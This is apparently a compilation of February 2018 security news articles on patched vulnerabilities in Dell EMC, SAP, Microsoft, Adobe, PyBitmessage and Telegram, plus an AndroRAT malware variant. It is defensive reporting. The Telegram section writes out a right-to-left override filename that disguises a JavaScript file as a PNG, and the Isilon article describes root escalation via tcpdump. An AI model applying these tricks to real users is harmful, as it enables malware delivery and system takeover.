“Hard-coded password vulnerability The vApp Manager contains an undocumented default account (ÒsmcÓ) with a hard-coded password that may be used with certain web servlets. A remote attacker with the knowledge of the hard-coded password and the message format may use vulnerable servlets to gain unauthorized access to the system. Note: This account cannot be used to log in via the web user interface.” continues the advisory.

The CVE-2018-1215 could be chained with a second flaw tracked as CVE-2018-1216 to use a hard-coded password to a default account to exploit this vulnerability.

“The vApp Manager which is embedded in Dell EMC Unisphere for VMAX, Dell EMC Solutions Enabler, Dell EMC VASA Virtual Appliances, and Dell EMC VMAX Embedded Management (eManagement) contains multiple security vulnerabilities that may potentially be exploited by malicious users to compromise the affected system.” states the security advisory issued by Dell EMC.

Affected products:

Dell EMC Unisphere for VMAX Virtual Appliance versions prior to 8.4.0.18
Dell EMC Solutions Enabler Virtual Appliance versions prior to 8.4.0.21
Dell EMC VASA Virtual Appliance versions prior to 8.4.0.514
Dell EMC VMAX Embedded Management (eManagement) versions prior to and including 1.4 (Enginuity Release 5977.1125.1125 and earlier)
Dell EMC has removed the default ÒsmcÓ account from new installs, but the company noticed that the account will not be removed after the upgrade of the vApp Manager application.


SAP Security Notes – February 2018 addresses tens of flaws including High Risk issues
15.2.2018 securityaffairs
Vulnerebility

SAP Security Notes – February 2018: SAP Security Notes February 2018 addressed several vulnerabilities including High-Risk flaws.
SAP has released February 2018 Patches that addressed some high-risk vulnerabilities in its software, a total of 26 Security Notes (5 high-, 19 medium- and 2 low-risk). Once again, the missing authorization check is the most common vulnerability type this month.

The Security Notes SAP addresses three cross-site scripting (XSS) vulnerabilities, two directory traversal flaws, two information disclosure bugs, two missing authorization checks, one unrestricted file upload, and other issues.

Affected products are the Internet Graphics Server (IGS), NetWeaver System Landscape Directory, HANA Extended Application Services, ABAP File Interface, SAP CRM, ERP Financials Information System, Netweaver Portal, Netweaver Java Web Application, CRM WebClient UI, BI Launchpad, and SAP HANA.

“On 13th of February 2018, SAP Security Patch Day saw the release of 11 Security Notes. Additionally, there were 3 updates to previously released security notes.” reads the advisory published by SAP.

SAP Security Notes Feb 2018

SAP also addressed previous Security Notes that includes an incorrect authorization check in ERP Logistics, a cross-site request forgery (CSRF) vulnerability in SAP Sybase, and a flaw that ties the way the SAP Note Assistant handles digitally signed notes.

Three critical vulnerabilities were reported by Mathieu Geli, Vahagn Vardanyan, and Vladimir Egorov, researchers at ERPScan security firm.

The details of the issues fixed thanks to the support of the researchers are:

A Missing Authentication check vulnerability in SAP NetWeaver System Landscape Directory (CVSS Base Score: 8.3 CVE-2018-2368). Update is available in SAP Security Note 2565622. An attacker can use Missing authorization check vulnerability for access to a service without any authorization procedures and use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation and other attacks.
A Directory Traversal vulnerability in SAP Internet Sales (CVSS Base Score: 6.6 CVE-2018-2380). Update is available in SAP Security Note 2547431. An attacker can use Directory traversal to access to arbitrary files and directories located in a SAP-server file system including application source code, configuration and system files. It allows to obtain critical technical and business-related information stored in a vulnerable SAP-system.
An Information Disclosure vulnerability in SAP HANA (CVSS Base Score: 5.3 CVE-2018-2369). Update is available in SAP Security Note 2572940. An attacker can use Information disclosure vulnerability for revealing additional information (system data, debugging information, etc) which will help to learn about a system and to plan other attacks.
The most severe vulnerability addressed by the security updates is a missing authentication check in SAP NetWeaver System Landscape Directory tracked as CVE-2018-2368, which received a CVSS base score of 8.3.

The flaw could be exploited by an attacker to access a service without any authorization, a circumstance that could lead to several attacks, including the privilege escalation and information disclosure,

“A Missing Authentication check vulnerability in SAP NetWeaver System Landscape Directory (CVSS Base Score: 8.3 CVE-2018-2368). Update is available in SAP Security Note 2565622. An attacker can use Missing authorization check vulnerability for access to a service without any authorization procedures and use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation and other attacks.” continues ERPScan.

The updates also addressed:

A Directory Traversal vulnerability in SAP Internet Sales (CVSS Base Score: 6.6 CVE-2018-2380) that could be exploited by an attacker to use Directory traversal to access to arbitrary files and directories located in a SAP-server file system including application source code, configuration and system files.
An Information Disclosure vulnerability in SAP HANA (CVSS Base Score: 5.3 CVE-2018-2369). that could be exploited by an attacker for revealing additional information (system data, debugging information, etc).
Other vulnerabilities addressed this month included a directory traversal (CVE-2018-2367) in SAP ABAP File Interface (CVSS base score: 6.6) and a directory traversal (CVE-2018-2380) in SAP Internet Sales (CVSS base score: 6.6).

Further info related to the flaws addressed by SAP are available on the company blog.


SAP Resolves High Risk Flaws with February 2018 Patches
15.2.2018 securityweek
Vulnerebility
SAP this week released its monthly set of security updates for its products, addressing a total of 11 new vulnerabilities, including two considered high severity.

Adding the number of patches released after the second Tuesday of January and before the second Tuesday of this month, along with updates to previously released patches, totals 26 Security Notes (5 high-, 19 medium- and 2 low-risk).

The Security Notes SAP released as part of the February 2018 Security Patch Day fix three cross-site scripting (XSS) flaws, two directory traversal issues, two missing authorization checks, two information disclosure bugs, one unrestricted file upload, and four other vulnerabilities, SAP says in an advisory.

The 11 new notes impact Internet Graphics Server (IGS), NetWeaver System Landscape Directory, HANA Extended Application Services, ABAP File Interface, SAP CRM, ERP Financials Information System, Netweaver Portal, Netweaver Java Web Application, CRM WebClient UI, BI Launchpad, and SAP HANA.

The updates for previous Security Notes include an incorrect authorization check in ERP Logistics, a cross-site request forgery (CSRF) vulnerability in SAP Sybase, and an issue related to the handling of digitally signed notes in SAP Note Assistant.

When all of the Security Notes released since the second Tuesday of January are taken into consideration, missing authorization check emerges as the most common vulnerability type, with seven occurrences, followed by XSS at five. SAP also addressed four implementation flaws, three directory traversals, two SQL injections, one SSRF, one cross-site request forgery, and one denial-of-service.

The most severe of the issues is a missing authentication check in SAP NetWeaver System Landscape Directory (CVE-2018-2368), with a CVSS base score of 8.3. An attacker exploiting it could access a service without any authorization procedures, which could lead to information disclosure, privilege escalation and other attacks, explains ERPScan, a company specialized in securing SAP and Oracle products.

Another critical bug (CVE-2018-2395) addressed this month impacted SAP IGS, had a CVSS base score of 8.3, and consisted of several vulnerabilities: unrestricted file upload (CVE-2018-2395), DoS (CVE-2018-2394, CVE-2018-2396, CVE-2018-2391, CVE-2018-2390, CVE-2018-2386, CVE-2018-2385, CVE-2018-2384), XML external entity (XXE) (CVE-2018-2393, CVE-2018-2392), log injection (CVE-2018-2389), and information disclosure (CVE-2018-2382, CVE-2018-2387).

SAP also resolved several information disclosure bugs (CVSS base score: 7.1) in HANA Extended Application Services: CVE-2018-2374, CVE-2018-2375, CVE-2018-2376, CVE-2018-2379, CVE-2018-2377, CVE-2018-2372 and CVE-2018-2373. These could lead to sensitive data leaks, including HANA database usernames and passwords, reveals Onapsis, the company that reported the flaws.

“Two high Priority notes have been published in tandem this month (notes #1584573 and #1977547). These notes are a re-release of an old note published as far back as 2011. It concerns an SQL-injection vulnerability in the component BC-UPG,” Onapsis explains.

Other bugs addressed this month included a directory traversal (CVE-2018-2380) in SAP Internet Sales (CVSS base score: 6.6), a directory traversal (CVE-2018-2367) in SAP ABAP File Interface (CVSS base score: 6.6), and an information disclosure (CVE-2018-2369) in SAP HANA (CVSS base score: 5.3).


Nine Remotely Exploitable Vulnerabilities Found in Dell EMC Storage Platform
15.2.2018 securityweek
Vulnerebility
Nine remotely exploitable vulnerabilities have been found in Dell EMC's Isilon OneFS platform, a scale-out NAS storage platform that combines modular hardware with unified software to harness unstructured data.

"Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root," warns an advisory released today.

The vulnerabilities were discovered by researchers Ivan Huertas and Maximiliano Vidal from CoreLabs, the research center of Core Security, and disclosed to Dell in September 2017. A range of Isilon OneFS versions from 7.1.1.11 to 8.0.1.2 were found to be affected by two or more of the vulnerabilities. "Other products and versions might be affected, but they were not tested," states the advisory.

The Isilon web console contains several features that are vulnerable to cross-site request forgery. Since there are no anti-CSRF tokens in any forms on the web interface, an attacker can submit authenticated requests when an authenticated user browses an attacker-controlled domain. If social engineering can convince an authenticated user or administrator to visit a malicious website, embedded code could be executed to create a new user with elevated privileges, or execute arbitrary commands in the target system.

This is the first (CVE-2018-1213) of the nine vulnerabilities. Two privilege escalation vulnerabilities could then be used, once initial access has been achieved, to allow the attacker to run shell commands or arbitrary Python code with root privilege.

The first of these (CVE-2018-1203) is possible because of incorrect sudo permissions. "The compadmin user can run the tcpdump binary with root privileges via sudo," explains the advisory. "This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files."

The second (CVE-2018-1204) is privilege escalation via remote support scripts. "As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo," explain the researchers. "This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges."

The remaining six vulnerabilities are persistent cross-site scripting errors: in the cluster description; the Network Configuration page; the Authentication Providers page; the Antivirus page; the Job Operations page; and the NDMP page.

All nine vulnerabilities were responsibly disclosed to Dell EMC on 25 September 2017. At first (about one month later), Dell proposed an update schedule including June 2018. CoreLabs replied that this was unacceptable given "given current industry standards."

Dell reviewed its schedules, and confirmed that they would have a fix available by February 12, 2018. The two parties agreed to release details of the vulnerabilities and fixes on February 14. Dell's fixes are available from its support site today. Dell's own advisory will be posted to the Full Disclosure mailing list today. It had not been done at the time of writing this article.

Dell completed the acquisition of data storage firm EMC in September 2016 in a record $67 billion deal. In the same deal, Dell also acquired RSA.

Core Security merged with SecureAuth and raised more than $200 million from K1 Investment Management and Toba Capital in September 2017.


Microsoft Patch Tuesday for February 2018 addresses 14 critical flaws
14.2.2018 securityaffairs
Vulnerebility

Microsoft Patch Tuesday for February 2018 addressed a total of 50 vulnerabilities in affecting Windows operating system, Microsoft Office, web browsers and other products of the tech giant.
Fourteen issues are listed as critical, 34 are rated as important, and only two of them are rated as moderate in severity.

The list of critical vulnerability includes an information disclosure issue in the Edge browser, a remote code execution vulnerability in the Windows’ StructuredQuery component, a memory corruption in Outlook, and several memory corruptions flaws that reside into the scripting engines used by both Edge and Internet Explorer.

One of the most severe vulnerabilities addressed by the Microsoft Patch Tuesday for February 2018 is a memory corruption flaw tracked as CVE-2018-0852 that affects Microsoft Outlook. The flaw could be exploited to achieve remote code execution on the targeted machines.

“A remote code execution vulnerability exists in Microsoft Outlook when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.” reads the security advisory published by Microsoft. “If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.”

In order to trigger the flaw, an attacker can trick the victim into opening a specifically crafted message attachment or viewing it in the Outlook Preview Pane … yes simply viewing an email in the Preview Pane could allow code execution.

“Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Outlook software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file designed to exploit the vulnerability.” continues the advisory.

Microsoft Patch Tuesday for February 2018

Another vulnerability affecting Outlook and addressed with the Microsoft Patch Tuesday for February 2018 is a privileged escalation issue tracked as CVE-2018-0850. The vulnerability is rated as important and can be exploited by an attacker by sending a specially crafted email to an Outlook user. The exploitation doesn’t require user’s action, the flaw is triggered when the message is merely received.

“An attacker who successfully exploited the vulnerability could attempt to force Outlook to load a local or remote message store (over SMB).” states the advisory published by Microsoft.

“To exploit the vulnerability, the attacker could send a specially crafted email to a victim. Outlook would then attempt to open a pre-configured message store contained in the email upon receipt of the email.”

Another critical flaw fixed by Microsoft is an information disclosure vulnerability (CVE-2018-0763), that affects Microsoft Edge. The vulnerability ties to the way Microsoft Edge improperly handles objects in the memory.

An attacker can trigger the flaw to obtain sensitive information to compromise the target machine, but in this case, it needs the user’s interaction.

“An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user’s system.” state the advisory published by Microsoft.

“To exploit the vulnerability, in a web-based attack scenario, an attacker could host a website in an attempt to exploit the vulnerability. In addition, compromised websites and websites that accept or host user-provided content could contain specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action.”

Let’s close with another issue fixed by Microsoft is the CVE-2018-0771 that affects Microsoft Edge, it was publicly known before by Microsoft.

“A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins. The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.” states Microsoft.

“In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.”

Users have to apply security patches as soon as possible.


Zero-Day Attack Prompts Emergency Patch for Bitmessage Client
14.2.2018 securityweek
Vulnerebility
An emergency update released on Tuesday for the PyBitmessage application patches a critical remote code execution vulnerability that has been exploited in attacks.

Bitmessage is a decentralized and trustless communications protocol that can be used for sending encrypted messages to one or multiple users. PyBitmessage is the official client for Bitmessage.

Bitmessage developers have issued a warning for a zero-day flaw that has been exploited against some users running PyBitmessage 0.6.2.

The security hole, described as a message encoding bug, has been patched with the release of version 0.6.3.2, but since PyBitmessage 0.6.1 is not affected by the flaw, downgrading is also an option for mitigating potential attacks.

Code patches were released on Tuesday, and binary files for Windows and macOS are expected to become available on Wednesday.

One of the individuals targeted in the zero-day attacks was Bitmessage core developer Peter Šurda. The developer told users not to contact him on his old address and admitted that his keys were most likely compromised. A new support address has been added to PyBitmessage 0.6.3.2.

“If you have a suspicion that your computer was compromised, please change all your passwords and create new bitmessage keys,” Surda said.

According to Šurda, the attacker exploited the vulnerability in an effort to create a remote shell and steal bitcoins from Electrum wallets.

“The exploit is triggered by a malicious message if you're the recipient (including joined chans),” the developer explained. “The attacker ran an automated script but also opened, or tried to open, a remote reverse shell. The automated script looked in ~/.electrum/wallets, but when using the reverse shell he had access to other files as well.”

The investigation into these attacks is ongoing and Bitmessage developers have promised to share more information as it becomes available.

Bitmessage has become increasingly popular in the past years following reports that the U.S. National Security Agency and other intelligence agencies are conducting mass surveillance. While the protocol is often used by people looking to protect their privacy, it has also been leveraged by cybercriminals, including in ransomware attacks for communications between victims and the hackers.


New AndroRAT Variant Emerges
14.2.2018 securityweek
Vulnerebility  Virus
A newly discovered variant of the AndroRAT off-the-shelf mobile malware can inject root exploits to perform malicious tasks, Trend Micro reports.

The updated malware version targets CVE-2015-1805, a publicly disclosed vulnerability that can be abused to achieve privilege escalation on older Android devices. By injecting root exploits, the threat can perform silent installation, shell command execution, WiFi password collection, and screen capture, security researchers have discovered.

First observed in 2012, AndroRAT was initially a university project, designed as an open-source client/server application to offer remote control of a device. It didn’t take long for cybercriminals to find the tool appealing and start using it in attacks.

The same as other Remote Access Tools (RATs), the malware gains root access in order to take control over the target system.

The newly observed version of the tool masquerades as a utility app called TrashCleaner, which the researchers believe is delivered from a malicious URL. When first executed, TrashCleaner prompts the user to install a Chinese-labeled calculator app, hides its icon from the device’s UI, and activates the RAT in the background.

“The configurable RAT service is controlled by a remote server, which could mean that commands may be issued to trigger different actions. The variant activates the embedded root exploit when executing privileged actions,” Trend Micro notes.

The malware can perform a broad range of actions previously observed in the original AndroRAT, including audio recording, photo taking, and system information theft (phone model, number, IMEI, etc.). It also steals WiFi names, call logs, mobile network cell location, GPS location, contacts, files on the device, list of running apps, and SMS messages, while keeping an eye on all incoming and outgoing SMS.

The threat is also capable of obtaining mobile network information, storage capacity, root status, list of installed applications, web browsing history from pre-installed browsers, and calendar events. Additionally, it can record calls, upload files to the device, capture photos using the front camera, delete and send forged SMS messages, take screenshots, execute shell commands, steal WiFi passwords, and silently enable accessibility services for a keylogger.

While the targeted vulnerability (CVE-2015-1805) was patched in early 2016, devices that are no longer updated regularly continue to be exposed to this new AndroRAT variant.

To avoid being targeted by the threat, users should avoid downloading and installing applications from third-party app stores. Installing the latest security updates and keeping all applications on the device updated at all times should also reduce the risk of being affected, the security researchers point out.


Adobe Patches 39 Vulnerabilities in Acrobat and Reader
14.2.2018 securityweek
Vulnerebility
Updates released on Tuesday by Adobe for its Acrobat, Acrobat Reader and Experience Manager products patch more than 40 vulnerabilities, but none of them appear to have been exploited for malicious purposes.

The company fixed a total of 39 flaws in its Acrobat and Reader products for Windows and Mac. The security holes, rated important and critical with a priority rating of 2, have been described as security mitigation bypass, heap overflow, use-after-free, out-of-bounds read, and out-of-bounds write weaknesses that can be exploited for privilege escalation or arbitrary code execution.

The flaws impact version 2018.009.20050 and earlier of Acrobat DC Continuous Track, version 2017.011.30070 and earlier of Acrobat 2017, and versions 2015.006.30394 and earlier of Acrobat DC Classic Track.

More than half of the vulnerabilities were reported to Adobe by employees of China-based Tencent. The disclosure was often made through Trend Micro’s Zero Day Initiative (ZDI).

As for Experience Manager, the latest version of the enterprise content management solution patches two vulnerabilities, including a reflected cross-site scripting (XSS) issue rated moderate, and an important XSS in the Apache Sling XSS protection API.

According to Adobe, exploitation of these flaws could allow attackers to obtain sensitive information. The company has not credited anyone for the Experience Manager security holes.

Earlier this month, Adobe issued an emergency update for Flash Player after learning that threat actors believed to be working on behalf of North Korea had been exploiting a zero-day vulnerability in attacks aimed at South Korea.

The group believed to be behind the attacks is tracked by FireEye as “TEMP.Reaper” and by Cisco Talos as “Group 123.”


Microsoft Patches 50 Flaws in Windows, Office, Browsers
14.2.2018 securityweek
Vulnerebility
Microsoft’s Patch Tuesday updates for February 2018 address 50 vulnerabilities in Windows, Office and the company’s web browsers, but this time the list does not appear to include any zero-day flaws.

Fourteen of the security holes have been rated critical, including an information disclosure flaw in Edge, a memory corruption in Outlook, a remote code execution vulnerability in Windows’ StructuredQuery component, and several memory corruptions in the scripting engines used by Edge and Internet Explorer.

One vulnerability, CVE-2018-0771, was publicly disclosed before Microsoft released patches. The issue is a Same-Origin Policy (SOP) bypass that exists due to the way Edge handles requests of different origins.

“An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted,” Microsoft said. The company believes it’s unlikely that this flaw, which it has rated “important,” will be exploited in attacks.

Two of the most interesting issues patched this month are Outlook vulnerabilities discovered by Microsoft’s own Nicolas Joly. One of the flaws, CVE-2018-0852, can be exploited to execute arbitrary code in the context of a user’s session by getting the target to open a specially crafted file with an affected version of Outlook.

“What’s truly frightening with this bug is that the Preview Pane is an attack vector, which means simply viewing an email in the Preview Pane could allow code execution,” explained Dustin Childs of the Zero Day Initiative (ZDI). “The end user targeted by such an attack doesn’t need to open or click on anything in the email – just view it in the Preview Pane. If this bug turns into active exploits – and with this attack vector, exploit writers will certainly try – unpatched systems will definitely suffer.”

The second Outlook vulnerability found by Joly is a privilege escalation issue (CVE-2018-0850) that can be leveraged to force Outlook to load a local or remote message store. The flaw can be exploited by sending a specially crafted email to an Outlook user.

“The email would need to be fashioned in a manner that forces Outlook to load a message store over SMB. Outlook attempts to open the pre-configured message on receipt of the email. You read that right – not viewing, not previewing, but upon receipt. That means there’s a potential for an attacker to exploit this merely by sending an email,” Childs said, pointing out that such a vulnerability would have earned Joly a prize in ZDI’s Pwn2Own competition.

Microsoft’s Patch Tuesday updates fix a total of 34 important and two moderate severity vulnerabilities.

Earlier this month, Microsoft updated the Adobe Flash Player components used by its products to address two vulnerabilities, including a zero-day believed to have been exploited by North Korean threat actors. Adobe on Tuesday released updates for its Acrobat, Reader and Experience Manager products to address 41 security bugs.


Zero-day vulnerability in Telegram

13.2.2018 Kaspersky  Vulnerebility
Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

Right-to-left override in a nutshell
The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse.


Mikko Hypponen
@mikko
New Mac Malware uses Right-to-Left override character (U+202E) to cause OS X to display this… http://www.f-secure.com/weblog/archives/00002576.html …

15:52 - 15 июл. 2013 г.
30
127 человек(а) говорят об этом
Информация о рекламе в Твиттере и конфиденциальность
Launching an attack on Telegram
Below is an account of how this vulnerability was exploited in Telegram:

The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:
evil.js -> photo_high_re*U+202E*gnp.js
Where *U+202E* is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js.

The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:

When the user clicks on this file, the standard Windows security notification is displayed:

Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched.

Exploitation in the wild
After learning the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios.

Remote control
The aim of this sort of attack is to take control of the victim’s system, and involves the attacker studying the target system’s environment and the installation of additional modules.

At the first stage, a downloader is sent to the target, which is written in .Net, and uses Telegram API as the command protocol:

With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:

When launched, it modifies startup registry key to achieve persistence on a system and copies its executable file into one of the directories, depending on the environment:

Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:

The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below: